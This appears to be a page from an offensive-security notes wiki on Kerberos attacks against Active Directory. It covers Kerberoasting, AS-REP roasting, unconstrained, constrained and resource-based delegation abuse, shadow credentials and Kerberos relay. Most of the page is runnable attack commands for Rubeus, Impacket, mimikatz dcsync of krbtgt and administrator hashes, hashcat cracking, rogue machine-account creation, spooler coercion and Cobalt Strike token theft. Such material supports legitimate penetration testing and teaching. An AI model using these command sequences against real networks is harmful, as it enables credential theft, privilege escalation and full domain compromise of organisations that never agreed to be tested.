Kerberos (88)
1. Kerberoasting
The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts.
A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account.
Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
- Without a shell:
With No Creds:
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
With Creds:
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -request
nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
- With a shell:
Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --outfile cracked.txt
PowerView
Get-DomainSPNTicket -SPN "MSSQLSvc/sqlserver.targetdomain.com"
Rubeus:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
By default, Rubeus will roast every account that has an SPN. Honey Pot accounts can be configured with a "fake" SPN, which will generate a 4769 event when roasted.
A much safer approach is to enumerate possible candidates first and roast them selectively. (To locate users who have an SPN set, go to ADSearch section in Exploitation/Active Directory/Host and Domain Recon/Other Tools/ADSearch)
Then to roast individual an account:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:{username} /nowrap
Then copy the hash in a .txt and try cracking it (Password Cracking with hashcat or john).
2. ASREP Roasting
The ASREPRoast attack looks for users without Kerberos pre-authentication required.
- Without a shell:
With No Creds:
GetNPUsers.py <domain_name>/ -usersfile <users_file.txt> -format <AS_REP_responses_format [hashcat |john] >-outputfile <output_AS_REP_responses_file>
GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetNPUsers.py {Domain_Name} -no-pass -usersfile users.txt
nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
After finishing the execution, the script will generate an output file with encoded AS_REP messages to crack using hashcat or John.
With Creds:
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
nxc ldap 192.168.0.104 -u harry -p pass --asreproast output.txt
nxc ldap 192.168.0.104 -u harry -p pass --asreproast output.txt --kdcHost domain_name
- With a shell:
ASREPRoast.ps1: https://github.com/HarmJ0y/ASREPRoast
powershell -ep bypass
Import-module ./asreproast.ps1
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 | select -expand hash
As with kerberoasting, we don't want to asreproast every account in the domain, so first, locate a user who does not have Kerberos pre-authentication enabled (Exploitation/Active Directory/Host and Domain Recon/Other Tools/ADSearch).
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap
3. Unconstrained Delegation
Delegation allows a user or machine to act on behalf of another user to another service. A common implementation of this is where a user authenticates to a front-end web application that serves a back-end database. The front-end application needs to authenticate to the back-end database (using Kerberos) as the authenticated user.
The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user.
When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory.
- Unconstrained Delegation Abuse
First we need to identify all computers that are permitted for unconstrained delegation (Exploitation/Active Directory/Host and Domain recon). ( Domain Controllers are always permitted for unconstrained delegation.)
Then, if we compromise a computer that is permitted for unconstrained delegation and wait or or socially engineer a privileged user to interact with it, we can steal their cached TGT. Interaction can be via any Kerberos service, so something as simple as dir \\{computer name}\c$ is enough.
To show all TGTs cached (TGTs can be identified by the krbtgt service), same process as Windows Post-Exploitation/Credential Theft/Rubeus (Extracting Kerberos Tickets):
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
Then we can PtT:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:{luid} /nowrap
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:{username} /password:FakePass /ticket:{ticket}
Then we need to impersonate the process that we created. We can do this through various different methods, for example, with Cobalt Strike:
steal_token {PID of the target process
- Force DC athenticate to the machine we are permitted for unconstrained delegation to steal its TGT
First, we should enumerate print spooler access:
ls \\dc.example.com\pipe\spoolss
Then, we need to monitor with Rubeus:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap (We can add /filteruser:{DC Target}$ to just receive the tickets from the DC)
Next, run SharpSpoolTrigger or SpoolSample:Next, run SharpSpoolTrigger or SpoolSample:
execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe {DC Target} {listener, machine we are permitted for unconstrained delegation}
Rubeus will then capture the ticket. To stop Rubeus, use the jobs and jobkill commands.
Now, as before, we can extract this TGT and leverage it via a new logon session (PtT).
If we forced a computer to authenticate in the computer we control and have the delegation, to use the ticket we will need to do the S4U2Self trick.
! If we force the DC to athenticate to our unconstrained permited machine, but the machine account is not a local administrator on the domain controller, we cannot directly perform lateral movement with it, but if it has domain replication permissions, we can perform dcsync and grab admin and krbtgt hashes:
First upload both, Rubeus and mimikatz, then, coerce the dc to authenticate in the machine permited for unconstrained delegation, the, launch mimikatz and execute the following:
ls \\dc.example.com\pipe\spoolss
.\Rubeus.exe monitor /interval:1 /nowrap
.\SpoolSample.exe {DC Target} {listener, machine we are permitted for unconstrained delegation}
.\Rubeus.exe ptt /ticket:base64Here
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:{domain} /user:krbtgt /csv" "exit"
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:{domain} /user:administrator /csv" "exit"
- Abuse from Linux w/ Impacket
If we don't have a shell we can request a linux ticket with impacket (first we need to sync the hour with the dc):
sudo apt-get install ntpdate
sudo apt-get install chrony
sudo timedatectl set-ntp true
sudo ntpdate {IP}
impacket-getST -spn {service/server we are allowed to access} -impersonate {User we want to impersonate} {domain/user we have the hash} -hashes :{hash}
4. Constrained Delegation
Kerberos Constrained Delegation (KCD) is a security feature in Microsoft's Active Directory (AD) that allows a service to impersonate a user or another service in order to access resources on behalf of that user or service.
First we need to identify all computers configured for constrained delegation (Exploitation/Active Directory/Host and Domain recon).
To perform the delegation, we need the TGT of the principal (computer or user) trusted for delegation (Windows Post-Exploitation/Credential Theft/Rubeus (Extracting Kerberos Tickets)):
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:{luid} /service:krbtgt /nowrap
We can also request one with Rubeus asktgt if we have NTLM or AES hashes (Overpass the Hash section), or kerberoast our own user to get a valid hash (If we crack the password, we can generate a hash for the request with .\Rubeus.exe hash /password:{password}), or tgtdeleg.
With the TGT, perform an S4U request to obtain a usable TGS for CIFS.
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:{user we want to impersonate - they should have local admin access on the target machine} /msdsspn:{service principal name that the user we have the ticket is allowed} /user:{user of the ticket we have (principal allowed to perform the delegation.)} /ticket:{ticket} /nowrap
This will perform an S4U2Self first and then an S4U2Proxy. It's this final S4U2Proxy ticket that we need, with that, we can PtT.
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:{domain name} /username:{target username} /password:FakePass /ticket:{S4U2proxy ticket}
Then we need to impersonate the process that we created. We can do this through various different methods, for example, with Cobalt Strike:
steal_token {PID of the target process}
If we own the computer permitted for constrained delegation and were able to get its hash:
.\Rubeus.exe s4u /user:{OWNED COMPUTER}$ /rc4:{hash ntlm of owned computer} /msdsspn:CIFS/TARGET.example.com /impersonateuser:administrator /ptt /nowrap
To do the same with impacket:
impacket-getST -spn cifs/target.example.com -impersonate 'administrator' -ts 'example.com/{OWNED COMPUTER}$' -hashes :{hash ntlm of owned computer} -dc-ip {dc ip}
KRB5CCNAME=/administrator.ccache
impacket-psexec -k -no-pass -target-ip {target ip} administrator@target.computer.com
- Alternate Service Name
If port 445 was unavailable or we wanted an option other then PsExec to jumpt into that machine, we can request a TGS for any other service also run by the computer account:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:{service principal name that the user we have the ticket is allowed} /altservice:ldap /user:{user of the ticket we have (principal allowed to perform the delegation.)} /ticket:{ticket} /nowrap
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:{domain name} /username:{target username} /password:FakePass /ticket:{S4U2proxy ticket}
Against a domain controller, the LDAP service allows us to perform a dcsync.
dcsync {domain name}\krbtgt
5. S4U2Self Abuse
If we obtained a TGT for the domain controller and tried to pass that ticket into a logon session and use it to access the C$ share (like we would with a user TGT), it would fail.
To gain access to a computer if we have its TGT:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:{target user} /self /altservice:{service principal name that the computer we have the ticket is allowed, like msdsspn before} /user:{computer name, ex: dc-2$} /ticket:{ticekt of the computer} /nowrap
Now with that ticket we can PtT:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:{domain name} /username:{target user} /password:FakePass /ticket:{ticket we have obtained}
Then we need to impersonate the process that we created. We can do this through various different methods, for example, with Cobalt Strike:
steal_token {PID of the target process}
6. Resource-Based Constrained Delegation (RBCD)
RBCD allows delegation based on the target resource rather than the source or destination service.
The two major prerequisites to pull off the attack are:
A target computer on which you can modify msDS-AllowedToActOnBehalfOfOtherIdentity.
Control of another principal that has an SPN.
Once we have local admin access to a computer and we have located an object with WriteProperty, GenericAll, GenericWrite or WriteDacl rights and obtained the computer SID (Exploitation/Active Directory/Host and Domain recon/PowerView/RBCD) we can start the attack.
First we need to create a security descriptor:
Then, these descriptor bytes can then be used with Set-DomainObject, to do all in a one-liner:
powershell $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{SID of a computer we control})"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity "{computer target}" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose
To check:
powershell Get-DomainComputer -Identity "{computer target}" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
Next, we use the account from the same group who has the WriteProperty rights in the computer target to perform the S4U impersonation with Rubeus:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:{luid} /service:krbtgt /nowrap
S4A Impersonation:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /user:{user we have the ticket} /impersonateuser:{target user} /msdsspn:{service principal name that the user we have the ticket is allowed} /ticket:{ticket we have} /nowrap
And with that we can PtT:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:{domain name} /username:{target user} /password:FakePass /ticket:{ticket we have obtained}
To clear up, simply remove the msDS-AllowedToActOnBehalfOfOtherIdentity entry on the target:
powershell Get-DomainComputer -Identity dc-2 | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity
If we don't have local admin access to a computer, before starting the attack, we can create our own computer object:
powershell Get-DomainObject -Identity "DC=dev,DC=cyberbotic,DC=io" -Properties ms-DS-MachineAccountQuota
First of all we create the computer object:
With StandIn:
.\StandIn.exe --computer EvilComputer --make
With Powermad (https://github.com/Kevin-Robertson/Powermad/tree/master):
New-MachineAccount -MachineAccount EVIL01 -Password $(ConvertTo-SecureString 'Password1' -AsPlainText -Force) -Verbose
Then we get the computer SID and create the security descriptor as before:
Get-DomainComputer -Identity EVIL01
powershell $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{SID of EVIL01})"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity "{computer target}" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose
Then, with Rubeus we generate a machine hash for the computer password:
.\Rubeus.exe hash /password:Password1 /user:EVIL01$ /domain:dev.domain.com
And now we can to do the s4a impersonation, we can do it with that hash:
.\Rubeus.exe s4u /user:EVIL01$ /rc4:{generated rc4 hash of Password1} /msdsspn:cifs/{target computer} /impersonateuser:administrator /ptt
or we can request a ticket and ptt:
.\Rubeus.exe asktgt /user:EVIL01$ /aes256:{generated aes256 hash of Password1} /nowrap
.\Rubeus.exe s4u /user:EVIL01$ /ticket:{ticket obtained through asktgt} /msdsspn:{service principal name we are allowed} /impersonateuser:administrator /ptt
7. Shadow Credentials
There is also a Key Trust model, where trust is established based on raw key data rather than a certificate. This requires a client to store their key on their own domain object, in an attribute called msDS-KeyCredentialLink. The basis of the "shadow credentials" attack is that if you can write to this attribute on a user or computer object, you can obtain a TGT for that principal.
First, we want to list any keys that might already be present for a target:
execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:{computer target, ex: dc-2$}
Add a new key pair to the target.
execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe add /target:dc-2$
And now, we can ask for a TGT using the Rubeus command that Whisker provides.
Then Rubeus will return a TGT and we can PtT.
Whisker's clear command will remove any and all keys from msDS-KeyCredentialLink. If a key was already present, we can list the entries again and only remove the one we want.
execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:dc-2$
execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe remove /target:dc-2$ /deviceid:58d0ccec-1f8c-4c7a-8f7e-eb77bc9be403
8. Kerberos Relay
If signing or channel binding are enabled then these attacks are not possible. Signing is still disabled by default, even on critical protocols such as LDAP.
CIFS/HOST-A and HTTP/HOST-A, would be encrypted with the same key.
First we should set up a malicious RPC server that would receive a KRB_AP_REQ for HOST/DC as the local computer account, which can be relayed to LDAP/DC.
With a valid service ticket for LDAP, they can submit requests to the DC as the computer account to modify the computer object in Active Directory.
This opens the door for other attacker primitives like RBCD and shadow credentials in order to achieve the LPE.
KrbRelayUp will automate the process: https://github.com/ShorSec/KrbRelayUp
- LPE through RBCD leveraged thanks to Kerberos Relay
It is necessary to have control over another computer object to abuse. The easiest way is to add your own computer object to the domain and get its SID:
execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer EvilComputer --make
Get-DomainComputer -Identity EvilComputer -Properties objectsid
The next step is to find a suitable port for the OXID resolver to circumvent a check in the Remote Procedure Call Service (RPCSS). This can be done with CheckPort.exe:
execute-assembly C:\Tools\KrbRelay\CheckPort\bin\Release\CheckPort.exe
Then use KrbRelay (original tool from cube0x0) with rbcd switch:
execute-assembly C:\Tools\KrbRelay\KrbRelay\bin\Release\KrbRelay.exe -spn ldap/{dc computer} -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd {SID of the created computer} -port 10
Then we will check the entry on the current owned computer:
Get-DomainComputer -Identity {current computer} -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
With the password of EvilComputer, we can request a TGT and perform an S4U to obtain a usable service tickets for the computer in which we want LPE:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:EvilComputer$ /aes256:{aes hash} /nowrap
To perform the elevation, we'll use this ticket to interact with the local Service Control Manager over Kerberos to create and start a service binary payload, using tools such as SCMUACBypass (https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82)
- LPE through Shadow Credentials leveraged thanks to Kerberos Relay
We don't need to add a fake computer for this attack.
First, verify that the currently owned computer (the one in which we want LPE) has nothing in its msDS-KeyCredentialLink attribute.
execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:{owned-computer}$
Then use KrbRelay (original tool from cube0x0) with shadowcred switch:
execute-assembly C:\Tools\KrbRelay\KrbRelay\bin\Release\KrbRelay.exe -spn ldap/{dc computer} -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred -port 10
Then use the returned command (rc4 hash) or to do the same with AES:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:{OWNED COMPUTER}$ /certificate:MIIJyA[...snip...]QCAgfQ /password:"06ce8e51-a71a-4e0c-b8a3-992851ede95f" /enctype:aes256 /nowrap
Then S4U2Self trick to obtain a HOST service ticket like with RBCD:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:host/{owned computer we want LPE} /user:{owned computer we want LPE}$ /ticket:{ticket obtained with the previous command} /ptt
Then we can perform the elevation like before.
Last updated